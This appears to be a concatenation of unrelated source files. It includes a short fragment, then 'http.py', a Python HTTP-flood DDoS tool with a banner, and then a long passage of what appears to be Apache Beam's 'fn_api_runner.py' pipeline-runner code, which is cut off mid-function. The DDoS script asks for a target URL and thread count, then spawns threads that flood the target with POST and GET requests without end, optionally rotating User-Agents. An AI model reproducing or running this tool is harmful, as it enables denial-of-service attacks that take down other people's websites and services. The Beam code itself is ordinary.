except (IOError):
if self.killed:
msg = "Cancelled"
else:
msg = "Finished"
self.write("\n[%s]" % msg)
break
def write(self, text):
self.output(text)
|
http.py
|
# Last Update: 18-09-2021, Author: Lusmaysh
import sys,os,random
R = "\33[31;1m";G = "\33[32;1m";Y = "\33[33;1m";
try:
from requests import *
from threading import Thread
from user_agent import generate_user_agent
except ImportError:
try:
os.system("pip3 install requests threaded user_agent")
except:
os.system("pip install requests threaded user_agent")
def main():
os.system("cls" if os.name=="nt" else "clear")
print(f"""{Y}■□■□■ {G}DDOS V.0.2 | By Lusmaysh {Y}■□■□■{G}\n
▓█████▄ ▓█████▄ ▒█████ ██████ {R}V.0.2{G}
▒██▀ ██▌▒██▀ ██▌▒██▒ ██▒▒██ ▒
░██ █▌░██ █▌▒██░ ██▒░ ▓██▄
░▓█▄ ▌░▓█▄ ▌▒██ ██░ ▒ ██▒
░▒████▓ ░▒████▓ ░ ████▓▒░▒██████▒▒
▒▒▓ ▒ ▒▒▓ ▒ ░ ▒░▒░▒░ ▒ ▒▓▒ ▒ ░
░ ▒ ▒ ░ ▒ ▒ ░ ▒ ▒░ ░ ░▒ ░ ░
░ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ░ ░ ░
░ ░ ░ ░ ░
░ ░
""")
try:
url = input(f"root{R}@{G}ddos (Url) {Y}≽ {R}")
get(url)
print(f"{Y}[{R}✠{Y}] {G}OK")
except exceptions.ConnectionError:
sys.exit(f"{Y}[{R}✠{Y}] {R}Please Check Your Internet!")
except:
sys.exit(f"{Y}[{R}✠{Y}] {R}Url Not Exsist!")
try:
loop = int(input(f"{G}root{R}@{G}ddos (Threads) {Y}≽ {R}"))
print(f"{Y}[{R}✠{Y}] {G}OK")
except:
sys.exit(f"{Y}[{R}✠{Y}] {R}Invalid Threads!")
option = input(f"""
{Y}[{R}1{Y}] {G}Use One User-Agent Always
{Y}[{R}2{Y}] {G}Changing User-Agent For Each Cycle
{G}root{R}@{G}ddos (Option) {Y}≽ {R}""")
if option == "1" or option == "2":
print(f"{Y}[{R}✠{Y}] {G}OK")
else:
sys.exit(f"{Y}[{R}✠{Y}] {R}Invalid Option!")
start = input(f"""
{Y}[{R}✠{Y}] {G}Yes (y)
{Y}[{R}✠{Y}] {G}No (n)
{G}root{R}@{G}ddos (Start DDoS) {Y}≽ {R}""")
def ddos_mode1():
ua = generate_user_agent()
while True:
try:
headers = {'User-Agent': ua}
ddos = post(url=url, headers=headers)
ddos2 = get(url=url, headers=headers)
for x in range(loop):
thread = Thread(target=ddos_mode1, daemon=True)
thread.start()
url_check_status = get(url=url, headers=headers)
if url_check_status.status_code == 200:
print(f"{Y}[{R}✠{Y}] {G}DDoS Attack Is Running! URL Status Code: {url_check_status}")
else:
print(f"{Y}[{R}✠{Y}] {G}DDoS Attack Is Running! URL Status Code: {R}{url_check_status}")
except:
continue
def ddos_mode2():
while True:
try:
headers = {'User-Agent': generate_user_agent()}
ddos = post(url=url, headers=headers)
ddos2 = get(url=url, headers=headers)
for x in range(loop):
thread = Thread(target=ddos_mode2, daemon=True)
thread.start()
url_check_status = get(url=url, headers=headers)
if url_check_status.status_code == 200:
print(f"{Y}[{R}✠{Y}] {G}DDoS Attack Is Running! URL Status Code: {url_check_status}")
else:
print(f"{Y}[{R}✠{Y}] {G}DDoS Attack Is Running! URL Status Code: {R}{url_check_status}")
except:
continue
if start=="y" or start=="Y" or start=="yes" or start=="Yes" or start=="YES":
if option == "1":
ddos_mode1()
elif option == "2":
ddos_mode2()
else:
sys.exit(f"{Y}[{R}✠{Y}] {R}DDoS Attack Was Canceled!")
main()
|
fn_api_runner.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""A PipelineRunner using the SDK harness.
"""
import base64
import collections
import copy
import logging
import Queue as queue
import threading
import time
from concurrent import futures
import grpc
import apache_beam as beam # pylint: disable=ungrouped-imports
from apache_beam.coders import WindowedValueCoder
from apache_beam.coders import registry
from apache_beam.coders.coder_impl import create_InputStream
from apache_beam.coders.coder_impl import create_OutputStream
from apache_beam.internal import pickler
from apache_beam.io import iobase
from apache_beam.metrics.execution import MetricsEnvironment
from apache_beam.portability.api import beam_fn_api_pb2
from apache_beam.portability.api import beam_fn_api_pb2_grpc
from apache_beam.portability.api import beam_runner_api_pb2
from apache_beam.runners import pipeline_context
from apache_beam.runners.portability import maptask_executor_runner
from apache_beam.runners.runner import PipelineState
from apache_beam.runners.worker import bundle_processor
from apache_beam.runners.worker import data_plane
from apache_beam.runners.worker import operation_specs
from apache_beam.runners.worker import sdk_worker
from apache_beam.transforms import trigger
from apache_beam.transforms.window import GlobalWindows
from apache_beam.utils import proto_utils
from apache_beam.utils import urns
# This module is experimental. No backwards-compatibility guarantees.
def streaming_rpc_handler(cls, method_name):
"""Un-inverts the flow of control between the runner and the sdk harness."""
class StreamingRpcHandler(cls):
_DONE = object()
def __init__(self):
self._push_queue = queue.Queue()
self._pull_queue = queue.Queue()
setattr(self, method_name, self.run)
self._read_thread = threading.Thread(target=self._read)
self._started = False
def run(self, iterator, context):
self._inputs = iterator
# Note: We only support one client for now.
self._read_thread.start()
self._started = True
while True:
to_push = self._push_queue.get()
if to_push is self._DONE:
return
yield to_push
def _read(self):
for data in self._inputs:
self._pull_queue.put(data)
def push(self, item):
self._push_queue.put(item)
def pull(self, timeout=None):
return self._pull_queue.get(timeout=timeout)
def empty(self):
return self._pull_queue.empty()
def done(self):
self.push(self._DONE)
# Can't join a thread before it's started.
while not self._started:
time.sleep(.01)
self._read_thread.join()
return StreamingRpcHandler()
class OldeSourceSplittableDoFn(beam.DoFn):
"""A DoFn that reads and emits an entire source.
"""
# TODO(robertwb): Make this a full SDF with progress splitting, etc.
def process(self, source):
if isinstance(source, iobase.SourceBundle):
for value in source.source.read(source.source.get_range_tracker(
source.start_position, source.stop_position)):
yield value
else:
# Dataflow native source
with source.reader() as reader:
for value in reader:
yield value
# See DataflowRunner._pardo_fn_data
OLDE_SOURCE_SPLITTABLE_DOFN_DATA = pickler.dumps(
(OldeSourceSplittableDoFn(), (), {}, [],
beam.transforms.core.Windowing(GlobalWindows())))
class _GroupingBuffer(object):
"""Used to accumulate groupded (shuffled) results."""
def __init__(self, pre_grouped_coder, post_grouped_coder, windowing):
self._key_coder = pre_grouped_coder.key_coder()
self._pre_grouped_coder = pre_grouped_coder
self._post_grouped_coder = post_grouped_coder
self._table = collections.defaultdict(list)
self._windowing = windowing
def append(self, elements_data):
input_stream = create_InputStream(elements_data)
while input_stream.size() > 0:
windowed_key_value = self._pre_grouped_coder.get_impl(
).decode_from_stream(input_stream, True)
key = windowed_key_value.value[0]
windowed_value = windowed_key_value.with_value(
windowed_key_value.value[1])
self._table[self._key_coder.encode(key)].append(windowed_value)
def __iter__(self):
output_stream = create_OutputStream()
trigger_driver = trigger.create_trigger_driver(self._windowing, True)
for encoded_key, windowed_values in self._table.items():
key = self._key_coder.decode(encoded_key)
for wkvs in trigger_driver.process_entire_key(key, windowed_values):
self._post_grouped_coder.get_impl().encode_to_stream(
wkvs, output_stream, True)
return iter([output_stream.get()])
class FnApiRunner(maptask_executor_runner.MapTaskExecutorRunner):
def __init__(self, use_grpc=False, sdk_harness_factory=None):
super(FnApiRunner, self).__init__()
self._last_uid = -1
self._use_grpc = use_grpc
if sdk_harness_factory and not use_grpc:
raise ValueError('GRPC must be used if a harness factory is provided.')
self._sdk_harness_factory = sdk_harness_factory
def has_metrics_support(self):
return False
def _next_uid(self):
self._last_uid += 1
return str(self._last_uid)
def run(self, pipeline):
MetricsEnvironment.set_metrics_supported(self.has_metrics_support())
if pipeline._verify_runner_api_compatible():
return self.run_via_runner_api(pipeline.to_runner_api())
else:
return super(FnApiRunner, self).run(pipeline)
def run_via_runner_api(self, pipeline_proto):
return self.run_stages(*self.create_stages(pipeline_proto))
def create_stages(self, pipeline_proto):
# First define a couple of helpers.
def union(a, b):
# Minimize the number of distinct sets.
if not a or a == b:
return b
elif not b:
return a
else:
return frozenset.union(a, b)
class Stage(object):
"""A set of Transforms that can be sent to the worker for processing."""
def __init__(self, name, transforms,
downstream_side_inputs=None, must_follow=frozenset()):
self.name = name
self.transforms = transforms
self.downstream_side_inputs = downstream_side_inputs
self.must_follow = must_follow
def __repr__(self):
must_follow = ', '.join(prev.name for prev in self.must_follow)
return "%s\n %s\n must follow: %s" % (
self.name,
'\n'.join(["%s:%s" % (transform.unique_name, transform.spec.urn)
for transform in self.transforms]),
must_follow)
def can_fuse(self, consumer):
def no_overlap(a, b):
return not a.intersection(b)
return (
not self in consumer.must_follow
and not self.is_flatten() and not consumer.is_flatten()
and no_overlap(self.downstream_side_inputs, consumer.side_inputs()))
def fuse(self, other):
return Stage(
"(%s)+(%s)" % (self.name, other.name),
self.transforms + other.transforms,
union(self.downstream_side_inputs, other.downstream_side_inputs),
union(self.must_follow, other.must_follow))
def is_flatten(self):
return any(transform.spec.urn == urns.FLATTEN_TRANSFORM
for transform in self.transforms)
def side_inputs(self):
for transform in self.transforms:
if transform.spec.urn == urns.PARDO_TRANSFORM:
payload = proto_utils.parse_Bytes(
transform.spec.payload, beam_runner_api_pb2.ParDoPayload)
for side_input in payload.side_inputs:
yield transform.inputs[side_input]
def has_as_main_input(self, pcoll):
for transform in self.transforms:
if transform.spec.urn == urns.PARDO_TRANSFORM:
payload = proto_utils.parse_Bytes(
transform.spec.payload, beam_runner_api_pb2.ParDoPayload)
local_side_inputs = payload.side_inputs
else:
local_side_inputs = {}
for local_id, pipeline_id in transform.inputs.items():
if pcoll == pipeline_id and local_id not in local_side_inputs:
return True
def deduplicate_read(self):
seen_pcolls = set()
new_transforms = []
for transform in self.transforms:
if transform.spec.urn == bundle_processor.DATA_INPUT_URN:
pcoll = only_element(transform.outputs.items())[1]
if pcoll in seen_pcolls:
continue
seen_pcolls.add(pcoll)
new_transforms.append(transform)
self.transforms = new_transforms
# Now define the "optimization" phases.
safe_coders = {}
def expand_gbk(stages):
"""Transforms each GBK into a write followed by a read.
"""
good_coder_urns = set(beam.coders.Coder._known_urns.keys()) - set([
urns.PICKLED_CODER])
coders = pipeline_components.coders
for coder_id, coder_proto in coders.items():
if coder_proto.spec.spec.urn == urns.BYTES_CODER:
bytes_coder_id = coder_id
break
else:
bytes_coder_id = unique_name(coders, 'bytes_coder')
pipeline_components.coders[bytes_coder_id].CopyFrom(
beam.coders.BytesCoder().to_runner_api(None))
coder_substitutions = {}
def wrap_unknown_coders(coder_id, with_bytes):
if (coder_id, with_bytes) not in coder_substitutions:
wrapped_coder_id = None
coder_proto = coders[coder_id]
if coder_proto.spec.spec.urn == urns.LENGTH_PREFIX_CODER:
coder_substitutions[coder_id, with_bytes] = (
bytes_coder_id if with_bytes else coder_id)
elif coder_proto.spec.spec.urn in good_coder_urns:
wrapped_components = [wrap_unknown_coders(c, with_bytes)
for c in coder_proto.component_coder_ids]
if wrapped_components == list(coder_proto.component_coder_ids):
# Use as is.
coder_substitutions[coder_id, with_bytes] = coder_id
else:
wrapped_coder_id = unique_name(
coders,
coder_id + ("_bytes" if with_bytes else "_len_prefix"))
coders[wrapped_coder_id].CopyFrom(coder_proto)
coders[wrapped_coder_id].component_coder_ids[:] = [
wrap_unknown_coders(c, with_bytes)
for c in coder_proto.component_coder_ids]
coder_substitutions[coder_id, with_bytes] = wrapped_coder_id
else:
# Not a known coder.
if with_bytes:
coder_substitutions[coder_id, with_bytes] = bytes_coder_id
else:
wrapped_coder_id = unique_name(coders, coder_id + "_len_prefix")
len_prefix_coder_proto = beam_runner_api_pb2.Coder(
spec=beam_runner_api_pb2.SdkFunctionSpec(
spec=beam_runner_api_pb2.FunctionSpec(
urn=urns.LENGTH_PREFIX_CODER)),
component_coder_ids=[coder_id])
coders[wrapped_coder_id].CopyFrom(len_prefix_coder_proto)
coder_substitutions[coder_id, with_bytes] = wrapped_coder_id
# This operation is idempotent.
if wrapped_coder_id:
coder_substitutions[wrapped_coder_id, with_bytes] = wrapped_coder_id
return coder_substitutions[coder_id, with_bytes]
def fix_pcoll_coder(pcoll):
new_coder_id = wrap_unknown_coders(pcoll.coder_id, False)
safe_coders[new_coder_id] = wrap_unknown_coders(pcoll.coder_id, True)
pcoll.coder_id = new_coder_id
for stage in stages:
assert len(stage.transforms) == 1
transform = stage.transforms[0]
if transform.spec.urn == urns.GROUP_BY_KEY_TRANSFORM:
for pcoll_id in transform.inputs.values():
fix_pcoll_coder(pipeline_components.pcollections[pcoll_id])
for pcoll_id in transform.outputs.values():
fix_pcoll_coder(pipeline_components.pcollections[pcoll_id])
# This is used later to correlate the read and write.
param = str("group:%s" % stage.name)
gbk_write = Stage(
transform.unique_name + '/Write',
[beam_runner_api_pb2.PTransform(
unique_name=transform.unique_name + '/Write',
inputs=transform.inputs,
spec=beam_runner_api_pb2.FunctionSpec(
urn=bundle_processor.DATA_OUTPUT_URN,
payload=param))],
downstream_side_inputs=frozenset(),
must_follow=stage.must_follow)
yield gbk_write
yield Stage(
transform.unique_name + '/Read',
[beam_runner_api_pb2.PTransform(
unique_name=transform.unique_name + '/Read',
outputs=transform.outputs,
spec=beam_runner_api_pb2.FunctionSpec(
urn=bundle_processor.DATA_INPUT_URN,
payload=param))],
downstream_side_inputs=frozenset(),
must_follow=union(frozenset([gbk_write]), stage.must_follow))
else:
yield stage
def sink_flattens(stages):
"""Sink flattens and remove them from the graph.
A flatten that cannot be sunk/fused away becomes multiple writes (to the
same logical sink) followed by a read.
"""
# TODO(robertwb): Actually attempt to sink rather than always materialize.
# TODO(robertwb): Possibly fuse this into one of the stages.
pcollections = pipeline_components.pcollections
for stage in stages:
assert len(stage.transforms) == 1
transform = stage.transforms[0]
if transform.spec.urn == urns.FLATTEN_TRANSFORM:
# This is used later to correlate the read and writes.
param = str("materialize:%s" % transform.unique_name)
output_pcoll_id, = transform.outputs.values()
output_coder_id = pcollections[output_pcoll_id].coder_id
flatten_writes = []
for local_in, pcoll_in in transform.inputs.items():
if pcollections[pcoll_in].coder_id != output_coder_id:
# Flatten inputs must all be written with the same coder as is
# used to read them.
pcollections[pcoll_in].coder_id = output_coder_id
transcoded_pcollection = (
transform.unique_name + '/Transcode/' + local_in + '/out')
yield Stage(
transform.unique_name + '/Transcode/' + local_in,
[beam_runner_api_pb2.PTransform(
unique_name=
transform.unique_name + '/Transcode/' + local_in,
inputs={local_in: pcoll_in},
outputs={'out': transcoded_pcollection},
spec=beam_runner_api_pb2.FunctionSpec(
urn=bundle_processor.IDENTITY_DOFN_URN))],
downstream_side_inputs=frozenset(),
must_follow=stage.must_follow)
pcollections[transcoded_pcollection].CopyFrom(
pcollections[pcoll_in])
pcollections[transcoded_pcollection].coder_id = output_coder_id
else:
transcoded_pcollection = pcoll_in
flatten_write = Stage(
transform.unique_name + '/Write/' + local_in,
[beam_runner_api_pb2.PTransform(
unique_name=transform.unique_name + '/Write/' + local_in,
inputs={local_in: transcoded_pcollection},
spec=beam_runner_api_pb2.FunctionSpec(
urn=bundle_processor.DATA_OUTPUT_URN,
payload=param))],
downstream_side_inputs=frozenset(),
must_follow=stage.must_follow)
flatten_writes.append(flatten_write)
yield flatten_write
yield Stage(
transform.unique_name + '/Read',
[beam_runner_api_pb2.PTransform(
unique_name=transform.unique_name + '/Read',
outputs=transform.outputs,
spec=beam_runner_api_pb2.FunctionSpec(
urn=bundle_processor.DATA_INPUT_URN,
payload=param))],
downstream_side_inputs=frozenset(),
must_follow=union(frozenset(flatten_writes), stage.must_follow))
else:
yield stage
def annotate_downstream_side_inputs(stages):
"""Annotate each stage with fusion-prohibiting information.
Each stage is annotated with the (transitive) set of pcollections that
depend on this stage that are also used later in the pipeline as a
side input.
While theoretically this could result in O(n^2) annotations, the size of
each set is bounded by the number of side inputs (typically much smaller
than the number of total nodes) and the number of *distinct* side-input
sets is also generally small (and shared due to the use of union
defined above).
This representation is also amenable to simple recomputation on fusion.
"""
consumers = collections.defaultdict(list)
all_side_inputs = set()
for stage in stages:
for transform in stage.transforms:
for input in transform.inputs.values():
consumers[input].append(stage)
for si in stage.side_inputs():
all_side_inputs.add(si)
all_side_inputs = frozenset(all_side_inputs)
downstream_side_inputs_by_stage = {}
def compute_downstream_side_inputs(stage):
if stage not in downstream_side_inputs_by_stage:
downstream_side_inputs = frozenset()
for transform in stage.transforms:
for output in transform.outputs.values():
if output in all_side_inputs:
downstream_side_inputs = union(downstream_side_inputs, output)
for consumer in consumers[output]:
downstream_side_inputs = union(
downstream_side_inputs,
compute_downstream_side_inputs(consumer))
downstream_side_inputs_by_stage[stage] = downstream_side_inputs
return downstream_side_inputs_by_stage[stage]
for stage in stages:
stage.downstream_side_inputs = compute_downstream_side_inputs(stage)
return stages
def greedily_fuse(stages):
"""Places transforms sharing an edge in the same stage, whenever possible.
"""
producers_by_pcoll = {}
consumers_by_pcoll = collections.defaultdict(list)
# Used to always reference the correct stage as the producer and
# consumer maps are not updated when stages are fused away.
replacements = {}
def replacement(s):
old_ss = []
while s in replacements:
old_ss.append(s)
s = replacements[s]
for old_s in old_ss[:-1]:
replacements[old_s] = s
return s
def fuse(producer, consumer):
fused = producer.fuse(consumer)
replacements[producer] = fused
replacements[consumer] = fused
# First record the producers and consumers of each PCollection.
for stage in stages:
for transform in stage.transforms:
for input in transform.inputs.values():
consumers_by_pcoll[input].append(stage)
for output in transform.outputs.values():
producers_by_pcoll[output] = stage
logging.debug('consumers\n%s', consumers_by_pcoll)
logging.debug('producers\n%s', producers_by_pcoll)
# Now try to fuse away all pcollections.
for pcoll, producer in producers_by_pcoll.items():
pcoll_as_param = str("materialize:%s" % pcoll)
write_pcoll = None
for consumer in consumers_by_pcoll[pcoll]:
producer = replacement(producer)
consumer = replacement(consumer)
# Update consumer.must_follow set, as it's used in can_fuse.
consumer.must_follow = set(
replacement(s) for s in consumer.must_follow)
if producer.can_fuse(consumer):
fuse(producer, consumer)
else:
# If we can't fuse, do a read + write.
if write_pcoll is None:
write_pcoll = Stage(
pcoll + '/Write',
[beam_runner_api_pb2.PTransform(
unique_name=pcoll + '/Write',
inputs={'in': pcoll},
spec=beam_runner_api_pb2.FunctionSpec(
urn=bundle_processor.DATA_OUTPUT_URN,
payload=pcoll_as_param))])
fuse(producer, write_pcoll)
if consumer.has_as_main_input(pcoll):
read_pcoll = Stage(
pcoll + '/Read',
[beam_runner_api_pb2.PTransform(
unique_name=pcoll + '/Read',
outputs={'out': pcoll},
spec=beam_runner_api_pb2.FunctionSpec(
urn=bundle_processor.DATA_INPUT_URN,
payload=pcoll_as_param))],
must_follow={write_pcoll})
fuse(read_pcoll, consumer)
# Everything that was originally a stage or a replacement, but wasn't
# replaced, should be in the final graph.
final_stages = frozenset(stages).union(replacements.values()).difference(
replacements.keys())
for stage in final_stages:
# Update all references to their final values before throwing
# the replacement data away.
stage.must_follow = frozenset(replacement(s) for s in stage.must_follow)
# Two reads of the same stage may have been fused. This is unneeded.
stage.deduplicate_read()
return final_stages
def sort_stages(stages):
"""Order stages suitable for sequential execution.
"""
seen = set()
ordered = []
def process(stage):
if stage not in seen:
seen.add(stage)
for prev in stage.must_follow:
process(prev)
ordered.append(stage)
for stage in stages:
process(stage)
return ordered
# Now actually apply the operations.
pipeline_components = copy.deepcopy(pipeline_proto.components)
# Reify coders.
# TODO(BEAM-2717): Remove once Coders are already in proto.
coders = pipeline_context.PipelineContext(pipeline_components).coders
for pcoll in pipeline_components.pcollections.values():
if pcoll.coder_id not in coders:
window_coder = coders[
pipeline_components.windowing_strategies[
pcoll.windowing_strategy_id].window_coder_id]
coder = WindowedValueCoder(
registry.get_coder(pickler.loads(pcoll.coder_id)),
window_coder=window_coder)
pcoll.coder_id = coders.get_id(coder)
coders.populate_map(pipeline_components.coders)
known_composites = set([urns.GROUP_BY_KEY_TRANSFORM])
def leaf_transforms(root_ids):
for root_id in root_ids:
root = pipeline_proto.components.transforms[root_id]
if root.spec.urn in known_composites or not root.subtransforms:
yield root_id
else:
for leaf in leaf_transforms(root.subtransforms):
yield leaf
# Initial set of stages are singleton leaf transforms.
stages = [
Stage(name, [pipeline_proto.components.transforms[name]])
for name in leaf_transforms(pipeline_proto.root_transform_ids)]
# Apply each phase in order.
for phase in [
annotate_downstream_side_inputs, expand_gbk, sink_flattens,
greedily_fuse, sort_stages]:
logging.info('%s %s %s', '=' * 20, phase, '=' * 20)
stages = list(phase(stages))
logging.debug('Stages: %s', [str(s) for s in stages])
# Return the (possibly mutated) context and ordered set of stages.
return pipeline_components, stages, safe_coders
def run_stages(self, pipeline_components, stages, safe_coders):
if self._use_grpc:
controller = FnApiRunner.GrpcController(self._sdk_harness_factory)
else:
controller = FnApiRunner.DirectController()
metrics_by_stage = {}
try:
pcoll_buffers = collections.defaultdict(list)
for stage in stages:
metrics_by_stage[stage.name] = self.run_stage(
controller, pipeline_components, stage,
pcoll_buffers, safe_coders).process_bundle.metrics
finally:
controller.close()
return RunnerResult(PipelineState.DONE, metrics_by_stage)
def run_stage(
self, controller, pipeline_components, stage, pcoll_buffers, safe_coders):
context = pipeline_context.PipelineContext(pipeline_components)
data_operation_spec = controller.data_operation_spec()
def extract_endpoints(stage):
# Returns maps of transform names to PCollection identifiers.
# Also mutates IO stages to point to the data data_operation_spec.
data_input = {}
data_side_input = {}
data_output = {}
for transform in stage.transforms:
pcoll_id = transform.spec.payload
if transform.spec.urn in (bundle_processor.DATA_INPUT_URN,
bundle_processor.DATA_OUTPUT_URN):
if transform.spec.urn == bundle_processor.DATA_INPUT_URN:
target = transform.unique_name, only_element(transform.outputs)
data_input[target] = pcoll_id
elif transform.spec.urn == bundle_processor.DATA_OUTPUT_URN:
target = transform.unique_name, only_element(transform.inputs)
data_output[target] = pcoll_id
else:
raise NotImplementedError
if data_operation_spec:
transform.spec.payload = data_operation_spec.SerializeToString()
else:
transform.spec.payload = ""
return data_input, data_side_input, data_output
logging.info('Running %s', stage.name)
logging.debug(' %s', stage)
data_input, data_side_input, data_output = extract_endpoints(stage)
if data_side_input:
raise NotImplementedError('Side inputs.')
process_bundle_descriptor = beam_fn_api_pb2.ProcessBundleDescriptor(
id=self._next_uid(),
transforms={transform.unique_name: transform
for transform in stage.transforms},
pcollections=dict(pipeline_components.pcollections.items()),
coders=dict(pipeline_components.coders.items()),
windowing_strategies=dict(
pipeline_components.windowing_strategies.items()),
environments=dict(pipeline_components.environments.items()))
process_bundle_registration = beam_fn_api_pb2.InstructionRequest(
instruction_id=self._next_uid(),
register=beam_fn_api_pb2.RegisterRequest(
process_bundle_descriptor=[process_bundle_descriptor]))
process_bundle = beam_fn_api_pb2.InstructionRequest(
instruction_id=self._next_uid(),
process_bundle=beam_fn_api_pb2.ProcessBundleRequest(
process_bundle_descriptor_reference=
process_bundle_descriptor.id))
# Write all the input data to the channel.
for (transform_id, name), pcoll_id in data_input.items():
data_out = controller.data_plane_handler.output_stream(
process_bundle.instruction_id, beam_fn_api_pb2.Target(
primitive_transform_reference=transform_id, name=name))
for element_data in pcoll_buffers[pcoll_id]:
data_out.write(element_data)
data_out.close()
# Register and start running the bundle.
controller.control_handler.push(process_bundle_registration)
controller.control_handler.push(process_bundle)
# Wait for the bundle to finish.
while True:
result = controller.control_handler.pull()
if result and result.instruction_id == process_bundle.instruction_id:
if result.error:
raise RuntimeError(result.error)
break
# Gather all output data.
expected_targets = [
beam_fn_api_pb2.Target(primitive_transform_reference=transform_id,
name=output_name)
for (transform_id, output_name), _ in data_output.items()]
for output in controller.data_plane_handler.input_elements(
process_bundle.instruction_id, expected_targets):
target_tuple = (
output.target.primitive_transform_reference, output.target.name)
if target_tuple in data_output:
pcoll_id = data_output[target_tuple]
if pcoll_id.startswith('materialize:'):
# Just store the data chunks for replay.
pcoll_buffers[pcoll_id].append(output.data)
elif pcoll_id.startswith('group:'):
# This is a grouping write, create a grouping buffer if needed.
if pcoll_id not in pcoll_buffers:
original_gbk_transform = pcoll_id.split(':', 1)[1]
transform_proto = pipeline_components.transforms[
original_gbk_transform]
input_pcoll = only_element(transform_proto.inputs.values())
output_pcoll = only_element(transform_proto.outputs.values())
pre_gbk_coder = context.coders[safe_coders[
pipeline_components.pcollections[input_pcoll].coder_id]]
post_gbk_coder = context.coders[safe_coders[
pipeline_components.pcollections[output_pcoll].coder_id]]
windowing_strategy = context.windowing_strategies[
pipeline_components
.pcollections[output_pcoll].windowing_strategy_id]
pcoll_buffers[pcoll_id] = _GroupingBuffer(
pre_gbk_coder, post_gbk_coder, windowing_strategy)
pcoll_buffers[pcoll_id].append(output.data)
else:
# These should be the only two identifiers we produce for now,
# but special side input writes may go here.
raise NotImplementedError(pcoll_id)
return result
# This is the "old" way of executing pipelines.
# TODO(robertwb): Remove once runner API supports side inputs.
def _map_task_registration(self, map_task, state_handler,
data_operation_spec):
input_data, side_input_data, runner_sinks, process_bundle_descriptor = (
self._map_task_to_protos(map_task, data_operation_spec))
# Side inputs will be accessed over the state API.
for key, elements_data in side_input_data.items():
state_key = beam_fn_api_pb2.StateKey.MultimapSideInput(key=key)
state_handler.Clear(state_key)
state_handler.Append(state_key, [elements_data])
return beam_fn_api_pb2.InstructionRequest(
instruction_id=self._next_uid(),
register=beam_fn_api_pb2.RegisterRequest(
process_bundle_descriptor=[process_bundle_descriptor])
), runner_sinks, input_data
def _map_task_to_protos(self, map_task, data_operation_spec):
input_data = {}
side_input_data = {}
runner_sinks = {}
context = pipeline_context.PipelineContext()
transform_protos = {}
used_pcollections = {}
def uniquify(*names):
# An injective mapping from string* to string.
return ':'.join("%s:%d" % (name, len(name)) for name in names)
def pcollection_id(op_ix, out_ix):
if (op_ix, out_ix) not in used_pcollections:
used_pcollections[op_ix, out_ix] = uniquify(
map_task[op_ix][0], 'out', str(out_ix))
return used_pcollections[op_ix, out_ix]
def get_inputs(op):
if hasattr(op, 'inputs'):
inputs = op.inputs
elif hasattr(op, 'input'):
inputs = [op.input]
else:
inputs = []
return {'in%s' % ix: pcollection_id(*input)
for ix, input in enumerate(inputs)}
def get_outputs(op_ix):
op = map_task[op_ix][1]
return {tag: pcollection_id(op_ix, out_ix)
for out_ix, tag in enumerate(getattr(op, 'output_tags', ['out']))}
for op_ix, (stage_name, operation) in enumerate(map_task):
transform_id = uniquify(stage_name)
if isinstance(operation, operation_specs.WorkerInMemoryWrite):
# Write this data back to the runner.
target_name = only_element(get_inputs(operation).keys())
runner_sinks[(transform_id, target_name)] = operation
transform_spec = beam_runner_api_pb2.FunctionSpec(
urn=bundle_processor.DATA_OUTPUT_URN,
payload=data_operation_spec.SerializeToString() \
if data_operation_spec is not None else None)
elif isinstance(operation, operation_specs.WorkerRead):
# A Read from an in-memory source is done over the data plane.
if (isinstance(operation.source.source,
maptask_executor_runner.InMemorySource)
and isinstance(operation.source.source.default_output_coder(),
WindowedValueCoder)):
target_name = only_element(get_outputs(op_ix).keys())
input_data[(transform_id, target_name)] = self._reencode_elements(
operation.source.source.read(None),
operation.source.source.default_output_coder())
transform_spec = beam_runner_api_pb2.FunctionSpec(
urn=bundle_processor.DATA_INPUT_URN,
payload=data_operation_spec.SerializeToString() \
if data_operation_spec is not None else None)
else:
# Otherwise serialize the source and execute it there.
# TODO: Use SDFs with an initial impulse.
# The Dataflow runner harness strips the base64 encoding. do the same
# here until we get the same thing back that we sent in.
source_bytes = base64.b64decode(
pickler.dumps(operation.source.source))
transform_spec = beam_runner_api_pb2.FunctionSpec(
urn=bundle_processor.PYTHON_SOURCE_URN,
payload=source_bytes)
elif isinstance(operation, operation_specs.WorkerDoFn):
# Record the contents of each side input for access via the state api.
side_input_extras = []
for si in operation.side_inputs:
assert isinstance(si.source, iobase.BoundedSource)
element_coder = si.source.default_output_coder()
# TODO(robertwb): Actually flesh out the ViewFn API.
side_input_extras.append((si.tag, element_coder))
side_input_data[
bundle_processor.side_input_tag(transform_id, si.tag)] = (
self._reencode_elements(
si.source.read(si.source.get_range_tracker(None, None)),
element_coder))
augmented_serialized_fn = pickler.dumps(
(operation.serialized_fn, side_input_extras))
transform_spec = beam_runner_api_pb2.FunctionSpec(
urn=bundle_processor.PYTHON_DOFN_URN,
payload=augmented_serialized_fn)
elif isinstance(operation, operation_specs.WorkerFlatten):
# Flatten is nice and simple.
transform_spec = beam_runner_api_pb2.FunctionSpec(
urn=bundle_processor.IDENTITY_DOFN_URN)
else:
raise NotImplementedError(operation)
transform_protos[transform_id] = beam_runner_api_pb2.PTransform(
unique_name=stage_name,
spec=transform_spec,
inputs=get_inputs(operation),
outputs=get_outputs(op_ix))
pcollection_protos = {
name: beam_runner_api_pb2.PCollection(
unique_name=name,
coder_id=context.coders.get_id(
map_task[op_id][1].output_coders[out_id]))
for (op_id, out_id), name in used_pcollections.items()
}
# Must follow creation of pcollection_protos to capture used coders.
context_proto = context.to_runner_api()
process_bundle_descriptor = beam_fn_api_pb2.ProcessBundleDescriptor(
id=self._next_uid(),
transforms=transform_protos,
pcollections=pcollection_protos,
coders=dict(context_proto.coders.items()),
windowing_strategies=dict(context_proto.windowing_strategies.items()),
environments=dict(context_proto.environments.items()))
return input_data, side_input_data, runner_sinks, process_bundle_descriptor
def _run_map_task(
self, map_task, control_handler, state_handler, data_plane_handler,
data_operation_spec):
registration, sinks, input_data = self._map_task_registration(
map_task, state_handler, data_operation_spec)
control_handler.push(registration)
